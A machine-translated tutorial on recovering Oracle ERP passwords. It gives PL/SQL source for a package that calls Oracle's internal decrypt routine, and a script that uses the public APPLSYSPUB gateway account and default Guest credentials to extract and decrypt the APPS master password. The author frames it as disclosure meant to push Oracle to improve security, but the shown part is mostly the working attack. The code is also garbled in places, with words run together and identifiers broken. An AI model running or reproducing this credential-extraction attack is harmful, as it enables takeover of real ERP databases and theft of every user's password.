1.Writing Purpose1
2.Create a Package in Oracle ERPDatabase using Toad or other pl/SQL tools. The source code is as follows:...1
(1) create a Package Header1
(2) create a Package Body.1
3.Procedure2
4.Use any User name/password to obtain the APPS password2
5.How to obtain the plaintext password through FND_USER: ENCRYPTED_USER_PASSWORD...3
6.The preceding Package is used to obtain the password of all Oracle ERPApplication users....3
7.The preceding Package is used to obtain the password of all Oracle ERPDatabase users....3
8.Delete the Package created in step 1 3
9.Conclusion3
10.Improve the security of Oracle ERP4
11.This program passed the Toad test in Oracle ERP 11.5.9.4
1. Writing Purpose
I have been thinking about this issue for a long time, but I think that the method of password cracking will still be known sooner or later, instead of letting a few people know about it, it is better to let everyone know that we should take precautions in advance.
The purpose of publishing the password cracking method is to make Oracle ERP more secure, so that we can use it with confidence. After all, it is tens of millions of things, the current security obviously does not meet the user's requirements. I want to use everyone's strength to put a little pressure on Oracle to make it safer for all Oracle ERP versions.
2. Create a Package in OracleERP Database using Toad or other pl/SQL tools. The source code is as follows:
(1) create a Package Header
- CREATE OR REPLACEPACKAGE CrackPwd AUTHIDCURRENT_USER
-
- AS
-
- FUNCTIONGetpwd (orauserINVARCHAR2, appuserpwdINVARCHAR2)
-
- RETURNVARCHAR2;
-
- ENDCrackPwd;
(2) create a Package Bdy
- CREATE OR REPLACEPackage body CrackPwd
-
- AS
-
- FUNCTIONGetpwd (orauserINVARCHAR2, appuserpwdINVARCHAR2)
-
- RETURNVARCHAR2
-
- AS
-
- LANGUAGE JAVA
-
- NAME 'Oracle. apps. fnd. security. WebSessionManagerProc. decrypt (java. lang. String, java. lang. String) return java. lang. string';
-
- ENDCrackPwd;
-
- /
3. Steps for obtaining the APPS Password
Suppose whatOracle erpNo Permissions,How to knowOracle erp databaesWhat about permissions??We knowOracle erpProvidesDatabasePublic Account(Gateway user ),Owned by this accountDatabaseMinimum permission,This public account is: APPLSYSPUB/PUB (oracle erpWebpage orURLMake public this account),Although this account has no Permissions,HoweverFND_USER_VIEWQuery permission,Through thisViewWe can see thatErpAllUserAndENCRYPED_FOUNDATION_PASSWORD field. The problem lies in the ENCRYPED_FOUNDATION_PASSWORD field of this view. The ENCRYPED_FOUNDATION_PASSWORD field is obtained by the APPS password and user password through the encryption algorithm, therefore, as long as you know the Oracle ERP decryption algorithm, you can use any user password in fnd_user to reverse query the apps password ., it is too easy to know the password of any user in fnd_user. Many accounts are preset during erp installation. The user names and passwords of these accounts are the same, generally, no one has changed the passwords of these accounts.
4. Use any Username/password to obtain the APPS password
- SETSERVEROUTPUTON
-
- DECLARE
-
- GuestUserPwd VARCHAR2 (200 );
-
- GuestUserName VARCHAR2 (100 );
-
- GuestFndPwd VARCHAR2 (100 );
-
- GuestEncFndPwd VARCHAR2 (100 );
-
- Delim NUMBER;
-
- BEGIN
-
- GuestUserPwd: ='Guest/ORACLE';-- Can any user password
-
- IF guestUserPwdIS NULL THEN
-
- GuestUserPwd: =UPPER(Fnd_profile.value ('Guest _ user_pwd'));
-
- ENDIF;
-
- Delim: = INSTR (guestUserPwd,'/');
-
- GuestUserName: =UPPER(SUBSTR (guestUserPwd, 1, delim-1 ));
-
- SELECTEncrypted_foundation_passwordINTOGuestEncFndPwd
-
- FROMFnd_user_view
-
- WHEREUser_name = guestUserNameAND(Start_date <= SYSDATE)AND
-
- (End_dateIS NULL OREnd_date> SYSDATE );
-
- GuestFndPwd: = CrackPwd. getpwd (guestUserPwd, guestEncFndPwd );
-
- IFNOT(GuestFndPwdIS NULL)THEN
-
- DBMS_OUTPUT.put_line (guestFndPwd );
-
- ENDIF;
-
- END;
Note: GuestUserPwd: ='Guest/ORACLE';-- Can any userpassword
The above line can be changed to the username/password of any User, and the account and password are separated "/"
The above program can be executed using toad